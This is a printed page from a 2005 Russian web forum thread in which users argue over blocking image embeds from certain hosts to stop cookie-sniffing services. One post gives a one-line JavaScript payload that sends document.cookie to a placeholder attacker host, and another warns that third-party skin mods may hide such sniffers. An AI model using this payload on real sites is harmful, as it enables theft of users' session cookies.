Strict Standards: Resource ID#34 used as offset, casting to integer (34) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#36 used as offset, casting to integer (36) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#37 used as offset, casting to integer (37) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Версия для печати :: Запрет вставки картинок с определенных хостов [2]
ТвойWeb » » ExBB - лучший форум на файлах » Запрет вставки картинок с определенных хостов

Страниц (2): « 1 [2]
 

11. Cyber-Cat - 26 Июня, 2005 - 05:56:56 - перейти к сообщению
Ray Wen
ну и в какую папку ты будешь записывать .htaccess ?
давай проведем эксперемент.
запрещай на своем форуме вставку картинки с адреса http://antichat.ru, а я попробую ее вставить...

Ray Wen пишет:
и тебе придется вносить еще домен, а затем еще и еще пока не надоест...

Меня это не смущает. Кто говорит что список будет маленький?
Он будет содержать сотни доменов Улыбка
12. SviMik - 26 Июня, 2005 - 06:05:06 - перейти к сообщению
Cyber-Cat пишет:
Меня это не смущает. Кто говорит что список будет маленький?
Он будет содержать сотни доменов

И интересно, а что если на этих доменах нормальные картинки будут, юзер ведь не сможет вставить. Ты об этом подумал?
Ray Wen пишет:
Порно... ты конечно извини, но я не видел ни на одном форуме размещенные порнокартинки...

Вот именно.
13. nokia6230 - 26 Июня, 2005 - 06:23:12 - перейти к сообщению
Ray Wen пишет:
Ну кроме ip я даже не знаю что может пригодится... и то, выключился, включился и у тебя уже новый ip...


А вот это батенька ты не прав...
С такими снифирами можно реально заполучить куки зашедшего на адресс всего лишь одного ресунка... А это не есть гуд.
Вот пример
CODE:
<script>img = new Image(); img.src = "http://твойсайт/cgi-bin/пример.jpg?"+document.cookie;</script>


Но так как форум от таких строк просто запрещен, то конечно же можно узнать только мелочные данные.
14. nokia6230 - 26 Июня, 2005 - 06:46:29 - перейти к сообщению
Cyber-Cat
Спасибо, что поднял эту тему.
Хочу предупредить всех, чтобы были осторожны при скачивании каких либо модов от посторонних людей для скинов и так далее. Так как кто-то может нарочно всунуть туда скрипт со снифиром, чтобы заполучить ваши Куки! Если вы что-нибудь такое качаете, то проверяйте внутренности этого файла. Было бы не приятно конечно же, если бы этот человек заполучил доступ к вашему форуму или порталу…
15. Cyber-Cat - 26 Июня, 2005 - 07:21:54 - перейти к сообщению
SviMik пишет:
И интересно, а что если на этих доменах нормальные картинки будут

Вряд ли найдется хоть одна нормальная картинка на _http://www.censored.net/ или _http://www.censored.com/
nokia6230 пишет:
Спасибо, что поднял эту тему.

Спасибо что понял суть и важность темы Подмигивание

Ссылки как посмотрите - удалите потом их, а то как то не прилично...
16. Ray Wen - 26 Июня, 2005 - 14:04:43 - перейти к сообщению
nokia6230
Cyber-Cat
Все дело в том, что если я ооочень сильно захочу получить ваши куки или вообще поместить снифер, то мне достаточно пойти и создать домен на бесплатном сервере... эта процедура займет не больш получаса, загрузить туда скрипт и сунуть ссылку... Что дальше? Вы вносите этот адрес в черный список, но за это время открывается еще один домен с этим скриптом... Что дальше? Я попрошу проделывать такую процедуру еще двух-трех человек... через неделю у вас в списке будет около полутысячи доменов.... если конечно не забадаетесь и форум будет тормозит уже от проверок каждой картинки... ИМХО, это не лекарство!
17. Ray Wen - 26 Июня, 2005 - 14:05:42 - перейти к сообщению
В таком случае лучше банить меня... искать Прокси куда сложнее чем создавать домены...
18. Cyber-Cat - 26 Июня, 2005 - 14:15:53 - перейти к сообщению
Одно дело создавать домены - это единичные случае...
А другое дело Сниффер-Сервисы. Которые я перечислил в первом посте, т.е. которые уже созданны для МАСС и ими пользуются очень много народу...
Это можно сравнить в массовой почтой... Т.е. ты можешь для почты свой собственный домен зарегить, а можешь пойти на mail.ru и открыть себе ящик. Вот и все сравнение Подмигивание

Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.4114]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33